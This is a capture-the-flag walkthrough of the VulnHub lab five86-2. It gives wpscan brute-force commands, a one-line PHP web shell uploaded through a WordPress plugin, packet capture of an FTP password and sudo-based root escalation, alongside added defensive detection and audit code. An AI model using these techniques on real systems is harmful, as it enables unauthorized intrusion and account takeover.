Target machine address: http://www.vulnhub.com/entry/five86-2,418/
Summary of technical points
• WordPress site testing
  - wpscan
• RCE vulnerability in the IEAC plugin for WordPress
  - WordPress plugin IEAC vulnerability analysis and combined exploitation attempt (referenced article)
• Use of tcpdump
Target discovery
nmap -sP performs a ping scan of the hosts on the LAN; the target is at 192.168.56.6.
nmap -A 192.168.56.6 -p- reveals information about the target host: -A enables operating system fingerprinting and version detection, and -p- scans all ports.
Ports 22, 21 and 80 are open; port 80 serves the WordPress 5.1.4 CMS.
It is best to add 192.168.56.6 five86-2 to /etc/hosts in advance, because visiting the WordPress backend (wp-admin) later redirects to that hostname.
Vulnerability discovery and exploitation
searchsploit and Google turn up no vulnerabilities for WordPress 5.1.4, so the site is scanned with wpscan, a scanner dedicated to WordPress. For detailed usage, see the complete guide to using WPScan.
The default scan returns the target site's middleware, XML-RPC status, readme file, upload path, WP-Cron, version, theme, all plugins and backup files.
Command: wpscan -u http://192.168.56.6/
Nothing useful is found here, so the next step is to enumerate usernames and then brute-force the passwords with rockyou.txt. The enumeration command wpscan --url http://192.168.56.6/ --enumerate u finds 5 users:
  - peter
  - admin
  - barney
  - gillian
  - stephen
Password brute-force command: wpscan --url http://192.168.56.6/ -U user.txt -P /usr/share/wordlists/rockyou.txt
Two results come out in the end:
Username: barney, Password: spooky1
Username: stephen, Password: apollo1
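From the defender's side, the enumeration and brute-force above leave a very recognisable trail in the web server's access log. This is an added example, not part of the original walkthrough: it parses combined-format log lines (the sample lines are constructed; the User-Agent string is what wpscan sends by default) and flags addresses that probe author IDs and hammer wp-login.php.

```python
"""Detect WordPress user enumeration and login brute-force in combined-format
access logs.  Added example, not part of the original walkthrough; the log
lines are constructed, with wpscan's default User-Agent string."""
import re
from collections import Counter, defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample.  /?author=N and /wp-json/wp/v2/users are what --enumerate u
# probes; WordPress answers a failed login POST with 200 and a successful one with 302.
SAMPLE_LOG = """\
192.168.56.1 - - [10/Jan/2020:12:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.7.8"
192.168.56.1 - - [10/Jan/2020:12:00:02 +0000] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 612 "-" "WPScan v3.7.8"
192.168.56.1 - - [10/Jan/2020:12:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3015 "-" "WPScan v3.7.8"
192.168.56.1 - - [10/Jan/2020:12:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3015 "-" "WPScan v3.7.8"
192.168.56.1 - - [10/Jan/2020:12:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3015 "-" "WPScan v3.7.8"
192.168.56.1 - - [10/Jan/2020:12:00:06 +0000] "POST /wp-login.php HTTP/1.1" 200 3015 "-" "WPScan v3.7.8"
192.168.56.1 - - [10/Jan/2020:12:00:07 +0000] "POST /wp-login.php HTTP/1.1" 200 3015 "-" "WPScan v3.7.8"
192.168.56.1 - - [10/Jan/2020:12:00:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.7.8"
10.0.0.7 - - [10/Jan/2020:12:01:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

def detect(lines, fail_threshold=5):
    """Return {ip: [reasons]} for addresses whose requests look like wpscan."""
    counts = defaultdict(Counter)  # ip -> Counter of indicator names
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not combined-format entries
        e = m.groupdict()
        c = counts[e["ip"]]
        login = e["method"] == "POST" and e["path"].startswith("/wp-login.php")
        if login and e["status"] == "200":
            c["failed_login"] += 1
        elif login and e["status"] == "302" and c["failed_login"] >= fail_threshold:
            c["success_after_failures"] += 1  # a guessed password landed
        if e["path"].startswith(("/?author=", "/wp-json/wp/v2/users")):
            c["user_enum"] += 1
        if "wpscan" in e["ua"].lower():
            c["scanner_ua"] += 1
    findings = {}
    for ip, c in counts.items():
        reasons = [f"{c['failed_login']} failed wp-login.php POSTs"] if c["failed_login"] >= fail_threshold else []
        reasons += [f"{c[k]} {k} hits" for k in ("success_after_failures", "user_enum", "scanner_ua") if c[k]]
        if reasons:
            findings[ip] = reasons
    return findings
```

The single legitimate 302 from 10.0.0.7 is not reported, while the scanner's address is flagged on all four indicators, including the successful login that followed its failures.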
Log in to the backend at http://five86-2/wp-admin/ as barney. The site has three plugins installed, but only Insert or Embed Articulate Content into WordPress Trial (IEAC) is activated:
  - Akismet Anti-Spam Version 4.1.1
  - Hello Dolly Version 1.7.1
  - IEAC Version 4.2995
A Google search easily finds an RCE for this plugin: WordPress plugin IEAC vulnerability analysis and combined exploitation attempt, which is also on exploit-db.
First generate poc.zip:
echo "hello" > index.html
echo '<?php echo system($_GET["cmd"]); ?>' > index.php
zip poc.zip index.html index.php
Then log in to the WordPress backend and create a new post
Choose to add a block
Choose E-Learning
Upload poc.zip
Choose Insert As iFrame
The upload location is shown, which means the shell ends up at http://192.168.56.6/wp-content/uploads/articulate_uploads/poc/index.php
Test the shell: http://192.168.56.6/wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami returns output, so command execution works.
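The root cause here is that the plugin unpacks whatever the zip contains straight into wp-content/uploads, where the web server will happily execute a .php member. The following is an added defensive example, not part of the original walkthrough or the plugin: it inspects a package before extraction and rejects server-executable members, path traversal and oversized archives. The sample archives are constructed in memory and mirror the poc.zip layout above.

```python
"""Validate an uploaded e-learning package before it is unpacked under the
web root.  Added defensive example, not part of the original walkthrough: the
plugin above extracts every zip member into wp-content/uploads, which is why a
member named index.php became a web shell.  Samples below are constructed."""
import io
import posixpath
import zipfile

# Members with these names would be executed by the PHP handler if extracted.
EXECUTABLE = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar", ".phps", ".htaccess"}
# What a genuine e-learning export actually contains.
ALLOWED = {".html", ".htm", ".js", ".css", ".json", ".xml", ".png", ".jpg", ".gif", ".svg", ".mp3", ".mp4", ".woff"}
MAX_UNPACKED = 50 * 1024 * 1024  # refuse zip bombs before extraction

def _ext(name):
    base = posixpath.basename(name).lower()
    return base if base.startswith(".") else posixpath.splitext(base)[1]

def inspect_package(data):
    """Return the reasons to reject the archive; an empty list means it is safe to extract."""
    problems, total = [], 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.startswith("/") or ".." in name.split("/") or "\\" in name:
                problems.append(f"unsafe path: {name}")  # would escape the upload dir
            if info.is_dir():
                continue
            ext = _ext(name)
            if ext in EXECUTABLE:
                problems.append(f"server-executable member: {name}")
            elif ext not in ALLOWED:
                problems.append(f"unexpected file type: {name}")
            total += info.file_size
    if total > MAX_UNPACKED:
        problems.append(f"unpacked size {total} exceeds limit")
    return problems

def make_zip(members):
    """Build a zip in memory from {name: bytes}; used only for constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()

# Mirrors the poc.zip above: a harmless index.html beside a PHP file.
POC_ZIP = make_zip({"index.html": b"hello\n", "index.php": b"<?php /* any PHP */ ?>\n"})
CLEAN_ZIP = make_zip({"index.html": b"<html></html>", "story.js": b"// course", "media/a.png": b"\x89PNG"})
```

Rejecting the archive is only half the fix; the upload directory should also be served with PHP execution disabled so that a member that slips through is never run.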
Use php-reverse-shell to get a reverse shell: visiting http://192.168.56.6/wp-content/uploads/articulate_uploads/poc4/shell.php triggers the connect-back. The resulting shell is not a TTY yet, so the next question is how to upgrade it to one.
ls /home shows 8 directories. Two passwords were just brute-forced: one was used to log in to the backend, the other has not been tested yet, and both users are among these 8. Try su barney first with the password spooky1, which fails; then try stephen with the password apollo1. For some reason the $ prompt no longer appears in this shell, but it still works.
In fact, www-data could have been given a TTY directly with python3 -c 'import pty;pty.spawn("/bin/bash")', which is probably more convenient.
Then sudo -l asks for a password, which is not spooky1, so let's su stephen; stephen turns out to be in a user group named pcap (isn't pcap a traffic capture? ^_^)
sudo -l again shows that sudo cannot be executed.
Back to pcap: does a traffic capture hint at traffic analysis? ifconfig is not available, but ip add works and shows several network interfaces currently up.
The last interface seems to be dynamic and is different every time. tcpdump -D lists the interfaces available for packet capture. I chose to capture on the last two because they are unusual. The capture command is timeout 120 tcpdump -w 1.pcap -i veth2c37c59, where timeout 120 stops after 2 minutes, -w writes the result to a file, and -i selects the interface to listen on.
The two capture files can be analyzed with tcpdump -r 1.pcap, where -r reads packets from the given file. The FTP password of the paul user, esomepasswford, is easy to spot. The content of 2.pcap is the same as that of 1.pcap.
su paul with that password succeeds. sudo -l then shows that stephen can run peter's service command.
peter's /bin/bash can then be executed directly with sudo -u peter service /bin/bash. Pay attention to the path here and use a relative path to reach /bin/bash.
After obtaining peter's privileges, sudo -l first again: peter can run the passwd command as root, so the root password can simply be changed to obtain root.
Now the real step: sudo -u root passwd root (writing -u root is a habit I keep throughout; it is the same as sudo passwd root).
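Both escalations above come from sudoers rules that hand over the target account: service runs whatever path it is given as a script, and passwd run as root rewrites root's password. This is an added defensive example, not part of the original walkthrough: it parses user specification lines from a sudoers file and flags rules for such commands, plus unrestricted ALL rules. The sample rules are constructed to resemble what sudo -l showed on this box, and Alias and Defaults lines are skipped as a simplification.

```python
"""Audit sudoers rules for the kind of escalation used on this box: a
service command run as another user and passwd run as root.  Added defensive
example, not from the original walkthrough; sample rules are constructed."""
import re

# Commands whose sudo rules hand over the runas account, as the walkthrough shows.
HANDS_OVER_ACCOUNT = {
    "service": "runs its argument as a script, so 'service /bin/bash' is a shell",
    "passwd": "rewrites the runas user's password",
    "su": "switches user outright",
}

RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\))?\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def parse_rule(line):
    s = line.strip()
    if not s or s.startswith(("#", "Defaults")) or s.split()[0].endswith("_Alias"):
        return None  # comments, Defaults and alias definitions are skipped
    m = RULE.match(s)
    if not m:
        return None
    d = m.groupdict()
    d["runas"] = (d["runas"] or "root").split(":")[0]  # omitted runas means root
    d["nopasswd"] = "NOPASSWD" in d["tags"]
    d["cmds"] = [c.strip() for c in d["cmds"].split(",")]
    return d

def audit_sudoers(text):
    """Return (user, runas, command, nopasswd, why) for every risky rule."""
    findings = []
    for line in text.splitlines():
        r = parse_rule(line)
        if r is None:
            continue
        for cmd in r["cmds"]:
            prog = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the binary
            why = "unrestricted" if cmd == "ALL" else HANDS_OVER_ACCOUNT.get(prog)
            if why:
                findings.append((r["user"], r["runas"], cmd, r["nopasswd"], why))
    return findings

# Constructed to resemble what sudo -l revealed on this box.
SAMPLE_SUDOERS = """\
paul ALL=(peter) NOPASSWD: /usr/sbin/service
peter ALL=(root) NOPASSWD: /usr/bin/passwd
deploy ALL=(root) /usr/bin/systemctl restart nginx
"""
```

The systemctl rule is not reported because it pins the full argument list, which is what the two flagged rules lack.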
Find the flag